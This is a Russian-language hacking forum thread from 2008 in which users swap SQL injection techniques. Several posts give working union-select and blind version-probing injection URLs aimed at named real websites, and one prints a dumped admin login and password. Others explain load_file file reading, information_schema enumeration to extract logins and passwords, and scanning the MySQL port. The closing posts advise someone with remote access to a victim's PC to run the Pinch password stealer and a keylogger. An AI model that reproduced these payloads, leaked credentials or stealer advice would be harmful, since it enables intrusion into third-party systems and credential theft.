Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. maxclk

    maxclk New Member

    Joined:
    15 Mar 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    2aka PSIH
    в mysql?
    в mssql проходил
     
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    >в mysql?
    да, если иньекция в select запросе, то update не прокатит :)


    >в mssql проходил
    в mssql можно разделить запрос, в mysql нет...
     
    #2042 aka PSIH, 25 May 2008
    Last edited: 25 May 2008
  3. Cr@zy_King

    Cr@zy_King Member

    Joined:
    12 Sep 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    -5
    http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id))),6,7,8,9,10+from+dealer--

    ampro_micro

    http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(password))),6,7,8,9,10+from+dealer--

    eics123

    http://www.bitdefenderthailand.com/admin/ -> Login Error :s

    Whais is The ProbLem ? Help .
     
  4. maxclk

    maxclk New Member

    Joined:
    15 Mar 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    а можно ли как-нибудь вызвать ошибку, чтобы отобразился абсолютпуть
    ну типа
    "SQL error: You have an error in.... ...."
    а потом
    "Line: 666
    File: /home/.../.."
    ?? спасибо
     
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Cr@zy_King
    зачем тогда concat??

    eics:eics123

    ты уверен что логин\пасс админа?? ))
     
    1 person likes this.
  6. maxclk

    maxclk New Member

    Joined:
    15 Mar 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    и если load_file ничего не выводит - то это
    неправильный путь? нету прав? отключен вывод ошибок?
    что может быть?
     
  7. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    скорей всего 2 или 3 вариант
     
  8. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    maxclk, может быть file_priv = 0, может быть ты пишешь просто 'path_to_file', а кавычки экранируюца.
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    hex/unhex - херня
    cast(blabla as binary) рулит

    Если прив лоад файл ничего не выводится, то это или 1 или 2-ой вариант
    первый отпадает если ты указываешь всегда существующий файл (/etc/hosts например)
    Даже если вывод ошибок включён, при неудачном лоад_файл, сообщение об ошибке не появится
     
  10. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    у меня такой вопрос появился... например есть уже раскрученая скуль вида site.com/index.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3+from+user+limit+1,1/*

    в ней выводится только по одной строке из базы (т.е. надо баловатся с лимитом).. все бы ничего, вот только в базе 9000 записей и ручками их все пребирать будет сложновато... есть ли скрипты которые перебирают лимит от 0 до нужного числа и сохраняют все записи в файл?
    если у кого нить есть то поделитесь пожалуйста, так каксам я пока что скриптовых языков не знаю, но все еще впереди((=
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.voiptraders.co.uk/shop.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
    выдает ошибку

    http://www.voiptraders.co.uk/shop.php?id=-3+order+by+17/* а так вроде подобрал таблицы..в чем трабла?
     
  12. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    это 3я ветка мускула нет union'а
    сравни
    Code:
    http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=5/*
    Code:
    http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=4/*
    Code:
    http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version(),1,1)=3/*
    3й запрос выберет инфу.
     
  13. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Народ, где может храниться информация, находящаяся в базах данных таблицы schemata ? Куча паролей,а откуда непонятно)(
     
  14. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    если я правильно тебя понял, то у тебя есть таблицы users например, но ты не знаешь к чему они относятся.
    чтобы узнать к какой базе они относятся выполни запрос типа:
    Code:
    select table_name, table_schema from information_schema.tables;
    потом, чтобы наверняка вытаскивать данные, запросы будут выглядеть примерно так:
    Code:
    select login,password from имя_схемы.users;
    и то если прав хватит в чужую бд смотреть.
     
  15. ad1das

    ad1das New Member

    Joined:
    12 Mar 2008
    Messages:
    10
    Likes Received:
    3
    Reputations:
    0
    ....
     
    #2055 ad1das, 26 May 2008
    Last edited: 26 May 2008
    1 person likes this.
  16. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    ищи config.php в папке форума
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пасип те Ж)))),Эт новый для Вельки запрос о_О.Я прост думал ещё,как узнать вообще все таблицы в какой-либо из базы в шеме,но принадлежность конкретной таблицы к базе тоже полезно...Права на бд есь,ток не во всех этих бд есть одна и та же папка :))).И ещё, особо интересует меня,нахрена там столько баз, если на нём хостится всего три сайта.Вот к примеру,в одной из баз лежит таблица админская,в которой хеш админа.А от чего он не пойму=)),к тому же там не один админский акк,а штук тридцать или больше).Мускула база отдельно лежит.
     
  18. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    штобы узнать таблы в одноц базе нужно сначала выбрать базу а потом сделать запрос типа
    Code:
    select table_name from information_schem.tables where table_schema='имя_схемы';
    возможно к этому серверу бд есть удаленное подключение.
    попробуй просканить его на порт 3306.
     
  19. atix

    atix New Member

    Joined:
    11 Mar 2008
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Ребят,имею доступ к компу через радмин.Нужно стырить все пароли на инет,и пассы и акки из строк заполнения в браузерах.Где это может находиться?
     
  20. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Запусти пинчя и поставь логер епт!
     
Thread Status:
Not open for further replies.